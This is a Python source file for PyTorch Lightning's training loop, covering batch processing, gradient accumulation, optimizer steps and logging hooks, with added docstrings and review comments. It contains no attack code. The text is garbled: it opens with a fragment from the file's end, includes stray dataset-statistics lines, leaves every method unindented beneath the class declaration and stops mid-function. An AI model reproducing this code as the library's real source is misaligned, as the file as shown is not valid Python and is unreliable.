        model.toggle_optimizer(optimizer, opt_idx)

    # use to track metrics internally
    self.trainer.logger_connector.on_train_split_start(split_idx, opt_idx, split_batch)
def update_running_loss(self):
    """Fold the accumulated-loss window into the running loss, then reset the accumulator.

    The window mean is multiplied back by ``accumulate_grad_batches`` so the
    displayed running loss reflects the unscaled batch loss.
    """
    accumulated_loss = self.accumulated_loss.mean()

    if accumulated_loss is not None:
        # calculate running loss for display; reuse the mean computed above
        # instead of recomputing it (the original called .mean() twice)
        self.running_loss.append(accumulated_loss * self.trainer.accumulate_grad_batches)

    # reset for next set of accumulated grads
    self.accumulated_loss.reset()
def zero_grad_handler(self, batch_idx, optimizer, opt_idx):
    """Zero gradients after (or instead of) an optimizer step.

    Automatic optimization zeroes only the active optimizer (after the
    ``on_before_zero_grad`` hook); manual optimization zeroes every
    configured optimizer.
    """
    if self.automatic_optimization:
        # hook
        self.on_before_zero_grad(optimizer)
        optimizers = enumerate([optimizer])
    else:
        optimizers = self.get_optimizers_iterable()

    for idx, optimizer in optimizers:
        # NOTE(review): the incoming `opt_idx` is forwarded for every optimizer
        # here (not the loop's `idx`) — confirm this is intentional in the
        # manual-optimization branch
        self.optimizer_zero_grad(batch_idx, optimizer, opt_idx)
| 41.995798
| 121
| 0.654402
|
from contextlib import contextmanager
from copy import copy, deepcopy
import numpy as np
import torch
import torch.distributed as torch_distrib
from pytorch_lightning.callbacks import ModelCheckpoint
from pytorch_lightning.core.lightning import LightningModule
from pytorch_lightning.core.memory import ModelSummary
from pytorch_lightning.core.step_result import EvalResult, Result
from pytorch_lightning.trainer.states import TrainerState
from pytorch_lightning.trainer.supporters import TensorRunningAccum, Accumulator
from pytorch_lightning.utilities import parsing, AMPType
from pytorch_lightning.utilities.distributed import rank_zero_info, rank_zero_warn
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.utilities.memory import recursive_detach
from pytorch_lightning.utilities.model_utils import is_overridden
from pytorch_lightning.utilities.parsing import AttributeDict
from pytorch_lightning.utilities.warning_utils import WarningCache
class TrainLoop:
def __init__(self, trainer):
    """Hold per-fit training-loop state on behalf of *trainer*."""
    self.trainer = trainer
    # accumulators for legacy `early_stop_on` / `checkpoint_on` result values
    self.early_stopping_accumulator = None
    self.checkpoint_accumulator = None
    # running window over the losses of one gradient-accumulation cycle
    self.accumulated_loss = None
    # de-duplicates repeated warnings (e.g. training_step returning None)
    self.warning_cache = WarningCache()
    self._teardown_already_run = False
    # smoothed loss shown while training
    self.running_loss = TensorRunningAccum(window_length=20)
    self.automatic_optimization = True
    # most recent training_step result, consumed by _process_closure_result
    self._curr_step_result = None
    # gradient norms recorded by track_and_norm_grad for the current step
    self._cur_grad_norm_dict = None
def on_trainer_init(
    self, max_epochs, min_epochs, max_steps, min_steps, num_sanity_val_steps, automatic_optimization
):
    """Initialize trainer-side loop state from the Trainer constructor arguments."""
    self.trainer.global_step = 0
    self.trainer.current_epoch = 0
    self.trainer.interrupted = False
    self.trainer.should_stop = False
    self.trainer._state = TrainerState.INITIALIZING

    self.trainer.total_batch_idx = 0
    self.trainer.batch_idx = 0
    self.trainer.num_training_batches = 0
    self.trainer.train_dataloader = None
    self.automatic_optimization = automatic_optimization

    self.trainer.max_epochs = max_epochs
    self.trainer.min_epochs = min_epochs
    self.trainer.max_steps = max_steps
    self.trainer.min_steps = min_steps

    # -1 means "sanity-check every validation batch"
    if num_sanity_val_steps == -1:
        self.trainer.num_sanity_val_steps = float("inf")
    else:
        self.trainer.num_sanity_val_steps = num_sanity_val_steps
@property
def num_optimizers(self):
    """Number of optimizers active for the current batch."""
    num_optimizers = len(self.get_optimizers_iterable())
    return num_optimizers
def should_skip_training(self):
    """True when there is nothing to train: max epochs reached or train batches disabled."""
    reached_max_epochs = self.trainer.current_epoch >= self.trainer.max_epochs
    no_train_batches = self.trainer.limit_train_batches == 0
    return reached_max_epochs or no_train_batches
def on_train_start(self):
    """Fire the ``on_train_start`` hook; on GPU, free cached memory first."""
    if self.trainer.on_gpu and self.trainer.root_gpu is not None:
        # enter the root GPU's device context so the correct device's cache is emptied
        with torch.cuda.device(f"cuda:{self.trainer.root_gpu}"):
            torch.cuda.empty_cache()

    # hook
    self.trainer.call_hook("on_train_start")
def setup_fit(self, model, train_dataloader, val_dataloaders, datamodule):
    """Bind trainer properties and data to *model* and validate the loop configuration."""
    # copy trainer-level properties (logger, precision, ...) onto the model
    self.trainer.model_connector.copy_trainer_model_properties(model)

    # clean hparams
    if hasattr(model, "hparams"):
        parsing.clean_namespace(model.hparams)

    # attach dataloaders / datamodule to the trainer
    self.trainer.data_connector.attach_data(model, train_dataloader, val_dataloaders, datamodule)

    # check that the model's configured hooks/loops are consistent
    self.trainer.config_validator.verify_loop_configurations(model)
def setup_training(self, model: LightningModule):
    """Wire up model/trainer references and run the pre-train routine.

    Covers: dist rank/device propagation, AMP scaler creation, hyper-parameter
    logging, SLURM signal handlers, pretrain hooks, the weights summary, and
    checkpoint restoration.
    """
    # when data-parallel wrapped, the LightningModule is the inner `.module`
    ref_model = model
    if self.trainer.data_parallel:
        ref_model = model.module

    # propagate rank/device to the accelerator's dist helper
    self.trainer.accelerator_backend.dist.rank = self.trainer.global_rank
    self.trainer.accelerator_backend.dist.device = ref_model.device

    # give the model a back-reference to the trainer
    ref_model.trainer = self.trainer
    self.trainer.model_connector.copy_trainer_model_properties(ref_model)

    # native AMP on GPU needs a gradient scaler
    if self.trainer.amp_backend == AMPType.NATIVE and self.trainer.precision == 16 and not self.trainer.use_tpu:
        self.trainer.scaler = torch.cuda.amp.GradScaler()

    # log hyper-parameters and the model graph, then persist the logger state
    if self.trainer.logger is not None:
        self.trainer.logger.log_hyperparams(ref_model.hparams_initial)
        self.trainer.logger.log_graph(ref_model)
        self.trainer.logger.save()

    # wait for all processes to join if running distributed
    self.trainer.accelerator_backend.barrier("setup_training")

    # register auto-resubmit handlers when running under SLURM
    self.trainer.slurm_connector.register_slurm_signal_handlers()

    # pretrain routine start (trainer callback + optional module hook)
    self.trainer.on_pretrain_routine_start(ref_model)
    if self.trainer.is_function_implemented("on_pretrain_routine_start"):
        ref_model.on_pretrain_routine_start()

    # print the weights summary on rank zero (unless testing)
    if self.trainer.is_global_zero and self.trainer.weights_summary is not None and not self.trainer.testing:
        if self.trainer.weights_summary in ModelSummary.MODES:
            ref_model.summarize(mode=self.trainer.weights_summary)
        else:
            raise MisconfigurationException("weights_summary can be None, " + ", ".join(ModelSummary.MODES))

    # track the (possibly wrapped) model and restore weights before training
    self.trainer.model = model
    self.trainer.checkpoint_connector.restore_weights(model)

    # pretrain routine end (trainer callback + optional module hook)
    self.trainer.on_pretrain_routine_end(ref_model)
    if self.trainer.is_function_implemented("on_pretrain_routine_end"):
        ref_model.on_pretrain_routine_end()
def on_train_end(self):
    """Tear down after training: final checkpoint, hooks, logger finalize, GPU cleanup.

    Idempotent — subsequent calls are no-ops.
    """
    if self._teardown_already_run:
        return

    self._teardown_already_run = True

    # NOTE(review): global_step is decremented around the checkpoint check and
    # restored afterwards — presumably to avoid re-saving a checkpoint already
    # written at the final step; confirm against the checkpoint callback
    self.trainer.global_step -= 1
    self.check_checkpoint_callback(should_save=True, is_last=True)
    self.trainer.global_step += 1

    # hook
    self.trainer.call_hook("on_train_end")

    # finalize loggers
    if self.trainer.logger is not None:
        self.trainer.logger.finalize("success")

    # print profiler summary on rank zero
    if self.trainer.global_rank == 0:
        self.trainer.profiler.describe()

    # give the accelerator a chance to clean up
    self.trainer.accelerator_backend.on_train_end()

    # move the model off the GPU and release cached memory
    if self.trainer.on_gpu:
        model = self.trainer.get_model()
        model.cpu()
        torch.cuda.empty_cache()
def check_checkpoint_callback(self, should_save, is_last=False):
    """Trigger ``ModelCheckpoint`` callbacks outside the validation loop.

    Used when no validation ran (or at the end of training) so checkpoints are
    still written. With ``is_last``, callbacks configured with ``save_last``
    additionally announce saving the latest checkpoint.
    """
    if should_save and self.trainer.checkpoint_connector.has_trained:
        checkpoint_callbacks = [c for c in self.trainer.callbacks if isinstance(c, ModelCheckpoint)]

        if is_last and any(c.save_last for c in checkpoint_callbacks):
            rank_zero_info("Saving latest checkpoint...")

        model = self.trainer.get_model()
        # plain loop: the previous list comprehension built and discarded a
        # list purely for its side effects
        for callback in checkpoint_callbacks:
            callback.on_validation_end(self.trainer, model)
def on_train_epoch_start(self, epoch):
    """Reset per-epoch state and fire the epoch-start hooks."""
    # update the progress tracker
    self.trainer.current_epoch = epoch

    model = self.trainer.get_model()

    # rebuild the train dataloader when reloading per epoch is requested
    if self.trainer.reload_dataloaders_every_epoch:
        self.trainer.reset_train_dataloader(model)

    # tell a distributed-style sampler which epoch this is (changes shuffling)
    try:
        self.trainer.train_dataloader.sampler.set_epoch(epoch)
    except Exception:
        # NOTE(review): broad best-effort guard — samplers without `set_epoch`
        # (or a missing dataloader/sampler) are silently ignored here
        pass

    # let the accumulation scheduler adjust accumulate_grad_batches
    self.trainer.accumulation_scheduler.on_epoch_start(self.trainer, self.trainer.get_model())

    # window over one gradient-accumulation cycle of losses
    self.accumulated_loss = TensorRunningAccum(window_length=self.trainer.accumulate_grad_batches)

    # accumulators for legacy `early_stop_on` / `checkpoint_on` values
    self.early_stopping_accumulator = Accumulator()
    self.checkpoint_accumulator = Accumulator()

    # hooks
    self.trainer.call_hook("on_epoch_start")
    self.trainer.call_hook("on_train_epoch_start")
def on_train_batch_end(self, epoch_output, epoch_end_outputs, batch, batch_idx, dataloader_idx):
    """Fire batch-end hooks, accumulate epoch-end outputs, and flush batch-level logs."""
    # hooks
    self.trainer.call_hook('on_batch_end')
    self.trainer.call_hook('on_train_batch_end', epoch_end_outputs, batch, batch_idx, dataloader_idx)

    # figure out what to track for epoch end
    self.track_epoch_end_reduce_metrics(epoch_output, epoch_end_outputs)

    # reset batch-level logger internals
    self.trainer.logger_connector.on_train_batch_end()
def reset_train_val_dataloaders(self, model):
    """Build train/val dataloaders up front unless they are reloaded every epoch."""
    reload_each_epoch = self.trainer.reload_dataloaders_every_epoch

    if not reload_each_epoch:
        self.trainer.reset_train_dataloader(model)

    if not reload_each_epoch and self.trainer.val_dataloaders is None:
        self.trainer.reset_val_dataloader(model)
def track_epoch_end_reduce_metrics(self, epoch_output, epoch_end_outputs):
    """Append each optimizer's step outputs to the epoch-level accumulator."""
    for opt_idx, opt_outputs in enumerate(epoch_end_outputs):
        # unwrap single-item lists, unless the single item is a Result object
        is_singleton_list = isinstance(opt_outputs, list) and len(opt_outputs) == 1
        if is_singleton_list and not isinstance(opt_outputs[0], Result):
            opt_outputs = opt_outputs[0]
        epoch_output[opt_idx].append(opt_outputs)
def get_optimizers_iterable(self):
    """Return the (index, optimizer) pairs active for the current batch.

    Without optimizer frequencies every optimizer runs each batch; with
    frequencies, exactly one optimizer is selected per batch in a
    frequency-weighted round-robin.
    """
    frequencies = self.trainer.optimizer_frequencies
    if not frequencies:
        # call training_step once per optimizer
        return list(enumerate(self.trainer.optimizers))

    freq_cumsum = np.cumsum(frequencies)
    loop_length = freq_cumsum[-1]
    position_in_loop = self.trainer.total_batch_idx % loop_length

    # pick the first optimizer whose cumulative frequency exceeds the position
    opt_idx = np.argmax(freq_cumsum > position_in_loop)
    return [[opt_idx, self.trainer.optimizers[opt_idx]]]
def on_after_backward(self, training_step_output, batch_idx, untouched_loss):
    """Detach step outputs after the backward pass and fire ``on_after_backward``."""
    is_result_obj = isinstance(training_step_output, Result)

    # cut the autograd graph: from here on outputs are only needed for logging
    if is_result_obj:
        training_step_output.detach()
    else:
        training_step_output.batch_loss = training_step_output.batch_loss.detach()

    # insert after step hook
    self.trainer.call_hook("on_after_backward")

    # when in dev debugging track the losses
    self.trainer.dev_debugger.track_train_loss_history(batch_idx, untouched_loss.detach())
def _check_training_step_output(self, training_step_output):
    """Guard: in manual optimization, ``training_step`` must not return a detached Tensor."""
    if isinstance(training_step_output, torch.Tensor) and not self.automatic_optimization:
        if training_step_output.grad_fn is None:
            # TODO: Find why - RuntimeError: Expected to mark a variable ready only once ...
            raise MisconfigurationException("In manual optimization, `training_step` should not return a Tensor")
def training_step(self, split_batch, batch_idx, opt_idx, hiddens):
    """Run the user's ``training_step`` (+ ``training_step_end``) for one batch split.

    Returns an ``AttributeDict`` with the accumulation-scaled ``closure_loss``,
    the detached ``loss`` for logging, and the raw / epoch-end step outputs,
    or ``None`` when the step produced nothing to optimize.
    """
    # give the PL module a result for logging
    model_ref = self.trainer.get_model()

    with self.trainer.profiler.profile("model_forward"):
        args = self.build_train_args(split_batch, batch_idx, opt_idx, hiddens)

        # manually capture logged metrics
        model_ref._current_fx_name = 'training_step'
        training_step_output = self.trainer.accelerator_backend.training_step(args)
        self.trainer.logger_connector.cache_logged_metrics()

        self._check_training_step_output(training_step_output)

        training_step_output = self.trainer.call_hook("training_step_end", training_step_output)

        training_step_output_for_epoch_end, training_step_output = self._process_training_step_output(
            training_step_output, split_batch
        )
        is_result_obj = isinstance(training_step_output, Result)

        if training_step_output_for_epoch_end is None:
            return None

    # enable empty loss when using manual opt
    closure_loss = None
    untouched_loss = None

    if self.trainer.train_loop.automatic_optimization:
        # accumulate loss
        # (if accumulate_grad_batches = 1 no effect)
        if is_result_obj:
            closure_loss = training_step_output.minimize
        else:
            closure_loss = training_step_output.batch_loss
        closure_loss = closure_loss / self.trainer.accumulate_grad_batches

        # the loss will get scaled for amp. avoid any modifications to it
        untouched_loss = closure_loss.detach().clone()

    # result
    result = AttributeDict(
        closure_loss=closure_loss,
        loss=untouched_loss,
        training_step_output=training_step_output,
        training_step_output_for_epoch_end=training_step_output_for_epoch_end,
        hiddens=training_step_output.hiddens,
    )
    return result
def _process_training_step_output(self, training_step_output, split_batch):
    """Normalize a raw ``training_step`` return into (epoch-end output, step output).

    Dispatches between the deprecated ``Result`` path, the 1.0-style
    dict/Tensor path, and the legacy ``log``/``progress_bar`` dict path.
    """
    training_step_output_for_epoch_end = training_step_output

    # enable validation_step return None
    if training_step_output_for_epoch_end is None:
        return None, None

    # -----------------------------------------
    # process result return (DEPRECATE in 1.0)
    # -----------------------------------------
    if isinstance(training_step_output, Result):
        training_step_output_for_epoch_end = self._process_result(training_step_output, split_batch)
        return training_step_output_for_epoch_end, training_step_output

    # -----------------------------------------
    # process hybrid (1.0)
    # -----------------------------------------
    # no need for these checks in 1.0.0
    # TODO: remove checks in 1.0.0
    is_tensor = isinstance(training_step_output_for_epoch_end, torch.Tensor)
    is_1_0_output = is_tensor or ("log" not in training_step_output and "progress_bar" not in training_step_output)
    if is_1_0_output:
        return self._process_training_step_output_1_0(training_step_output, split_batch)

    # -----------------------------------------
    # process old dict (deprecate 1.0)
    # -----------------------------------------
    training_step_output = self.trainer.process_dict_result(training_step_output, train=True)

    training_step_output = AttributeDict(
        batch_loss=training_step_output[0],
        pbar_on_batch_end=training_step_output[1],
        log_metrics=training_step_output[2],
        callback_metrics=training_step_output[3],
        hiddens=training_step_output[4],
    )
    # if the user decides to finally reduce things in epoch_end, save raw output without graphs
    if isinstance(training_step_output_for_epoch_end, torch.Tensor):
        training_step_output_for_epoch_end = training_step_output_for_epoch_end.detach()
    else:
        training_step_output_for_epoch_end = recursive_detach(training_step_output_for_epoch_end)

    return training_step_output_for_epoch_end, training_step_output
def _process_training_step_output_1_0(self, training_step_output, split_batch):
    """Handle a 1.0-style ``training_step`` return (a loss tensor, or a dict
    with ``loss``/``hiddens``/extras) by mapping it onto the module's
    ``_results`` object.

    Returns (detached epoch-end copy, live result used for backward).
    """
    result = self.trainer.get_model()._results
    loss = None
    hiddens = None
    # handle dict return
    if isinstance(training_step_output, dict):
        loss = training_step_output.pop("loss", None)
        hiddens = training_step_output.pop("hiddens", None)
        result["extra"] = training_step_output
    # handle scalar return
    elif isinstance(training_step_output, torch.Tensor):
        loss = training_step_output
        result["extra"] = {}
    # map to results under the hood
    result.minimize = loss
    result.hiddens = hiddens
    # track batch for manual reduction with result
    result.track_batch_size(len(split_batch))
    # track metrics without grads for epoch reduction
    training_step_output_for_epoch_end = copy(result)
    training_step_output_for_epoch_end.detach()
    if self.trainer.move_metrics_to_cpu:
        # keep the epoch-end copy off the accelerator to save device memory
        training_step_output_for_epoch_end.cpu()
    # what flows back into the system
    training_step_output = result
    return training_step_output_for_epoch_end, training_step_output
def _process_result(self, training_step_output, split_batch):
    """Handle a deprecated ``TrainResult`` return from ``training_step``:
    warn about the deprecation, reject ``EvalResult``, and return a detached
    copy for epoch-end aggregation.
    """
    training_step_output.track_batch_size(len(split_batch))
    m = """
    TrainResult and EvalResult were deprecated in 0.9.1 and support will drop in 1.0.0.
    Use self.log and .write from the LightningModule to log metrics and write predictions.
    training_step can now only return a scalar (for the loss) or a dictionary with anything you want.
    Option 1:
    return loss
    Option 2:
    return {'loss': loss, 'anything_else': ...}
    Option 3:
    return {'loss': loss, 'hiddens': hiddens, 'anything_else': ...}
    """
    rank_zero_warn(m)
    # don't allow EvalResult in the training_step
    if isinstance(training_step_output, EvalResult):
        raise MisconfigurationException(
            "training_step cannot return EvalResult, " "use a dict or TrainResult instead"
        )
    # detach so the epoch-end copy holds no autograd graph
    training_step_output_for_epoch_end = copy(training_step_output)
    training_step_output_for_epoch_end.detach()
    return training_step_output_for_epoch_end
def optimizer_step(self, optimizer, opt_idx, batch_idx, train_step_and_backward_closure):
    """Run one optimizer step through the accelerator backend, timed by the
    profiler.

    ``train_step_and_backward_closure`` re-runs the forward/backward pass and
    is forwarded so the backend (or the optimizer itself) can invoke it when
    stepping.
    """
    with self.trainer.profiler.profile("optimizer_step"):
        self.trainer.accelerator_backend.optimizer_step(
            optimizer, batch_idx, opt_idx, train_step_and_backward_closure
        )
def on_before_zero_grad(self, optimizer):
    """Fire the ``on_before_zero_grad`` hook for ``optimizer``."""
    self.trainer.call_hook('on_before_zero_grad', optimizer)
def optimizer_zero_grad(self, batch_idx, optimizer, opt_idx):
    """Zero ``optimizer``'s gradients via the accelerator backend."""
    self.trainer.accelerator_backend.optimizer_zero_grad(batch_idx, optimizer, opt_idx)
def track_and_norm_grad(self, optimizer):
    """Record gradient norms and clip gradients before the optimizer step."""
    # the norm is computed before clipping, so it reflects the unclipped gradients
    grad_norm_dic = self._track_gradient_norm()
    self.trainer.accelerator_backend.clip_gradients(optimizer)
    # stash for later aggregation/logging by the batch loop
    self._cur_grad_norm_dict = grad_norm_dic
def _track_gradient_norm(self):
    """Compute model gradient norms, but only on steps that will be logged
    and only when ``track_grad_norm`` is enabled; otherwise return {}."""
    grad_norm_dict = {}
    # skip the (potentially expensive) norm computation on non-logging steps
    if (self.trainer.global_step + 1) % self.trainer.log_every_n_steps == 0:
        if float(self.trainer.track_grad_norm) > 0:
            model = self.trainer.get_model()
            grad_norm_dict = model.grad_norm(self.trainer.track_grad_norm)
    return grad_norm_dict
def process_hiddens(self, opt_closure_result):
    """Extract TBPTT hiddens from a closure result.

    For ``Result`` outputs, hiddens are also dropped from the epoch-end copy
    so they are not retained for the whole epoch.
    """
    hiddens = opt_closure_result.hiddens
    if isinstance(opt_closure_result.training_step_output, Result):
        opt_closure_result.training_step_output_for_epoch_end.drop_hiddens()
    return hiddens
def tbptt_split_batch(self, batch):
    """Split ``batch`` into truncated-BPTT chunks via the LightningModule hook.

    When truncated BPTT is disabled, the batch is returned untouched as a
    single-element list.
    """
    if self.trainer.truncated_bptt_steps is None:
        return [batch]
    model_ref = self.trainer.get_model()
    with self.trainer.profiler.profile("tbptt_split_batch"):
        return model_ref.tbptt_split_batch(batch, self.trainer.truncated_bptt_steps)
def run_training_epoch(self):
    """Run one full training epoch: iterate batches, trigger validation when
    due, step ``interval='step'`` LR schedulers, and fire epoch-end
    hooks/logging."""
    model = self.trainer.get_model()
    # let the accelerator adapt the dataloader (e.g. distributed sampling)
    train_dataloader = self.trainer.accelerator_backend.process_dataloader(self.trainer.train_dataloader)
    # one output bucket per optimizer
    epoch_output = [[] for _ in range(self.num_optimizers)]
    train_dataloader = self.trainer.data_connector.get_profiled_train_dataloader(train_dataloader)
    dataloader_idx = 0
    should_check_val = False
    for batch_idx, (batch, is_last_batch) in train_dataloader:
        self.trainer.batch_idx = batch_idx
        # TRAINING_STEP + TRAINING_STEP_END (+ backward/step)
        batch_output = self.run_training_batch(batch, batch_idx, dataloader_idx)
        # a -1 signal from the batch ends the epoch early
        if batch_output.signal == -1:
            break
        # keep only the outputs that epoch end actually needs (memory)
        epoch_end_outputs = self.process_train_step_outputs(
            batch_output.training_step_output_for_epoch_end,
            self.early_stopping_accumulator,
            self.checkpoint_accumulator,
        )
        # batch-end hook + per-batch output bookkeeping
        self.on_train_batch_end(epoch_output, epoch_end_outputs, batch, batch_idx, dataloader_idx)
        # push step metrics to the loggers
        self.trainer.logger_connector.log_train_step_metrics(batch_output)
        # run mid-epoch validation when due
        should_check_val = self.should_check_val_fx(batch_idx, is_last_batch)
        if should_check_val:
            self.trainer.run_evaluation(test_mode=False)
            # validation switched the stage; restore it for training
            self.trainer.logger_connector.set_stage("train")
        self.save_loggers_on_train_batch_end()
        # update per-step LR schedulers with a snapshot of the callback metrics
        monitor_metrics = deepcopy(self.trainer.logger_connector.callback_metrics)
        self.update_train_loop_lr_schedulers(monitor_metrics=monitor_metrics)
        self.trainer.checkpoint_connector.has_trained = True
        # max_steps reached: stop, but only once gradient accumulation has
        # completed so the final optimizer step is not cut short
        # NOTE(review): the `global_step + 1` comparison looks intentional
        # (break before the step counter advances) — confirm upstream.
        if self.trainer.max_steps is not None and self.trainer.max_steps == self.trainer.global_step + 1:
            accumulation_done = self._accumulated_batches_reached()
            if accumulation_done:
                break
        # end epoch early: stop when the flag is changed or we've gone past
        # the amount requested in the batches
        if self.trainer.should_stop:
            break
        self.trainer.total_batch_idx += 1
        # stop epoch if we limited the number of training batches
        if (batch_idx + 1) >= self.trainer.num_training_batches:
            break
        # progress global step according to grads progress
        self.increment_accumulated_grad_global_step()
    # epoch end hook
    self.run_on_epoch_end_hook(epoch_output)
    # log epoch metrics
    self.trainer.logger_connector.log_train_epoch_end_metrics(
        epoch_output,
        self.checkpoint_accumulator,
        self.early_stopping_accumulator,
        self.num_optimizers
    )
    # when no val loop is present or fast-dev-run still need to call checkpoints
    self.check_checkpoint_callback(not (should_check_val or is_overridden('validation_step', model)))
    # increment the global step once
    # progress global step according to grads progress
    self.increment_accumulated_grad_global_step()
def run_training_batch(self, batch, batch_idx, dataloader_idx):
    """Run a full training batch: start hooks, TBPTT splitting, the
    per-optimizer closures (forward/backward/step) and running-loss updates.

    Returns an ``AttributeDict`` with ``signal`` (0 ok, -1 stop requested),
    ``grad_norm_dic`` and ``training_step_output_for_epoch_end`` (one list of
    step outputs per optimizer).
    """
    # track grad norms
    grad_norm_dic = {}
    # bookkeeping (removed an unused `using_results_obj` local here)
    self.trainer.hiddens = None
    # track all outputs across time and num of optimizers
    batch_outputs = [[] for _ in range(len(self.get_optimizers_iterable()))]
    if batch is None:
        return AttributeDict(signal=0, grad_norm_dic=grad_norm_dic)
    # hook: either start hook may abort the batch by returning -1
    response = self.trainer.call_hook("on_batch_start")
    if response == -1:
        return AttributeDict(signal=-1, grad_norm_dic=grad_norm_dic)
    # hook
    response = self.trainer.call_hook("on_train_batch_start", batch, batch_idx, dataloader_idx)
    if response == -1:
        return AttributeDict(signal=-1, grad_norm_dic=grad_norm_dic)
    # lightning module hook
    splits = self.tbptt_split_batch(batch)
    for split_idx, split_batch in enumerate(splits):
        # create an iterable for optimizers and loop over them
        for opt_idx, optimizer in self.prepare_optimizers():
            # toggle model params + set info to logger_connector
            self.run_train_split_start(split_idx, split_batch, opt_idx, optimizer)
            if self.should_accumulate():
                # For gradient accumulation
                # -------------------
                # calculate loss (train step + train step end)
                # -------------------
                # perform ddp sync only when performing optimizer_step
                with self.block_ddp_sync_behaviour():
                    self.training_step_and_backward(split_batch, batch_idx, opt_idx, optimizer, self.trainer.hiddens)
                batch_outputs = self._process_closure_result(
                    batch_outputs=batch_outputs,
                    opt_idx=opt_idx,
                )
            # ------------------------------
            # BACKWARD PASS
            # ------------------------------
            # gradient update with accumulated gradients
            else:
                if self.automatic_optimization:
                    def train_step_and_backward_closure():
                        result = self.training_step_and_backward(
                            split_batch,
                            batch_idx,
                            opt_idx,
                            optimizer,
                            self.trainer.hiddens
                        )
                        return None if result is None else result.loss
                    # optimizer step
                    self.optimizer_step(optimizer, opt_idx, batch_idx, train_step_and_backward_closure)
                else:
                    # manual optimization: the user steps optimizers themselves
                    self._curr_step_result = self.training_step(
                        split_batch,
                        batch_idx,
                        opt_idx,
                        self.trainer.hiddens
                    )
                if self._curr_step_result is None:
                    # user decided to skip optimization
                    # make sure to zero grad.
                    self.zero_grad_handler(batch_idx, optimizer, opt_idx)
                    continue
                batch_outputs = self._process_closure_result(
                    batch_outputs=batch_outputs,
                    opt_idx=opt_idx,
                )
                # TODO: properly aggregate grad_norm across opt_idx and split_idx
                grad_norm_dic = self._cur_grad_norm_dict
                self._cur_grad_norm_dict = None
                # hook + clear gradients
                self.zero_grad_handler(batch_idx, optimizer, opt_idx)
                # update running loss + reset accumulated loss
                self.update_running_loss()
    result = AttributeDict(
        signal=0,
        grad_norm_dic=grad_norm_dic,
        training_step_output_for_epoch_end=batch_outputs,
    )
    return result
@contextmanager
def block_ddp_sync_behaviour(self):
    """Context manager that suppresses DDP gradient synchronization while
    accumulating gradients, so the all-reduce only happens on the step that
    actually runs the optimizer. A no-op for non-DDP models.
    """
    if isinstance(self.trainer.model, torch.nn.parallel.DistributedDataParallel):
        # BUGFIX: ``no_sync()`` returns a context manager; it must be ENTERED
        # (not merely yielded as a value) for gradient sync to be skipped.
        with self.trainer.model.no_sync():
            yield None
    else:
        yield None
def _process_closure_result(
    self, batch_outputs: list, opt_idx: int
) -> list:
    """Consume ``self._curr_step_result``: cache its metrics, carry TBPTT
    hiddens forward, guard against NaNs, and append its epoch-end output to
    the bucket for ``opt_idx``. The step result is cleared afterwards.
    """
    opt_closure_result = self._curr_step_result
    if opt_closure_result is not None:
        # cache metrics
        self.trainer.logger_connector.cache_training_step_metrics(opt_closure_result)
        # track hiddens
        self.trainer.hiddens = self.process_hiddens(opt_closure_result)
        # check if loss or model weights are nan
        if self.trainer.terminate_on_nan:
            self.trainer.detect_nan_tensors(opt_closure_result.loss)
        # track all the outputs across all steps
        # with a single optimizer there is only bucket 0
        batch_opt_idx = opt_idx if len(batch_outputs) > 1 else 0
        batch_outputs[batch_opt_idx].append(opt_closure_result.training_step_output_for_epoch_end)
        if self.automatic_optimization:
            # track total loss for logging (avoid mem leaks)
            self.accumulated_loss.append(opt_closure_result.loss)
    # the step result is single-use; clear it for the next closure
    self._curr_step_result = None
    return batch_outputs
def training_step_and_backward(self, split_batch, batch_idx, opt_idx, optimizer, hiddens):
    """Run ``training_step`` and, in automatic optimization, the backward
    pass plus the ``on_after_backward`` hook and NaN check.

    Returns the step result, or ``None`` when the user's step returned None.
    """
    # lightning module hook
    result = self.training_step(split_batch, batch_idx, opt_idx, hiddens)
    self._curr_step_result = result
    if result is None:
        self.warning_cache.warn("training_step returned None if it was on purpose, ignore this warning...")
        return None
    if self.trainer.train_loop.automatic_optimization:
        # backward pass
        with self.trainer.profiler.profile("model_backward"):
            self.backward(result, optimizer, opt_idx)
        # hook - call this hook only
        # when gradients have finished to accumulate
        if not self.should_accumulate():
            self.on_after_backward(result.training_step_output, batch_idx, result.loss)
        # check if loss or model weights are nan
        if self.trainer.terminate_on_nan:
            self.trainer.detect_nan_tensors(result.loss)
    return result
def backward(self, result, optimizer, opt_idx, *args, **kwargs):
    """Dispatch the backward pass to the accelerator backend.

    ``result`` is either a raw loss tensor (manual calls) or a step result
    object carrying ``closure_loss``. Gradient norms are tracked and clipped
    only when this backward completes an accumulation window.
    """
    self.trainer.dev_debugger.track_event("backward_call")
    # backward can be called manually in the training loop
    if isinstance(result, torch.Tensor):
        self.trainer.accelerator_backend.backward(result, optimizer, opt_idx, *args, **kwargs)
    else:
        result.closure_loss = self.trainer.accelerator_backend.backward(
            result.closure_loss, optimizer, opt_idx, *args, **kwargs
        )
    if not self.should_accumulate():
        # track gradients
        self.track_and_norm_grad(optimizer=optimizer)
def update_train_loop_lr_schedulers(self, monitor_metrics=None):
    """Step ``interval='step'`` LR schedulers when an optimizer step just ran
    (i.e. an accumulation window closed or the epoch's final batch ran)."""
    stepped = self._accumulated_batches_reached() or self._num_training_batches_reached()
    if stepped:
        self.trainer.optimizer_connector.update_learning_rates(interval="step", monitor_metrics=monitor_metrics)
def run_on_epoch_end_hook(self, epoch_output):
    """Fire the epoch-end hooks in order, then let the logger connector
    finalize the epoch. The call order is part of the contract."""
    self.trainer.call_hook('on_epoch_end')
    self.trainer.call_hook('on_train_epoch_end', epoch_output)
    self.trainer.logger_connector.on_train_epoch_end()
def increment_accumulated_grad_global_step(self):
    """Advance ``trainer.global_step`` once per effective optimizer step.

    The global step counts optimizer steps, not micro-batches, so it only
    moves when an accumulation window closes or the epoch's last batch ran.
    """
    if self._accumulated_batches_reached() or self._num_training_batches_reached():
        self.trainer.global_step += 1
def _accumulated_batches_reached(self):
    """True when the current batch completes a gradient-accumulation window."""
    return (self.trainer.batch_idx + 1) % self.trainer.accumulate_grad_batches == 0
def _num_training_batches_reached(self):
    """True when the current batch is the last training batch of the epoch."""
    return (self.trainer.batch_idx + 1) == self.trainer.num_training_batches
def should_accumulate(self):
    """Whether this step only accumulates gradients (backward without an
    optimizer step, driven via the closure)."""
    # keep accumulating unless we hit the accumulation boundary or the
    # epoch's final batch
    boundary_reached = self._accumulated_batches_reached() or self._num_training_batches_reached()
    return not boundary_reached
def should_check_val_fx(self, batch_idx, is_last_batch):
    """Return whether a validation run should be triggered after this batch."""
    trainer = self.trainer
